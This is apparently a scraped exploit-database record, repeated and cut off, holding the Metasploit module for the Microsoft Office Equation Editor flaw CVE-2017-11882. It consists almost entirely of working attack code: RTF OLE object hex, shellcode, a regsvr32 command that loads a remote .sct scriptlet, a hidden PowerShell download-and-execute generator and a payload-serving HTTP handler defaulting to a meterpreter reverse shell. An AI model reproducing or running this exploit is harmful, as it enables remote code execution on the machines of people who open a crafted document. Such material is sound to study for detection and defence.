'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-15T19:37:41", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-21T19:47:02", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << 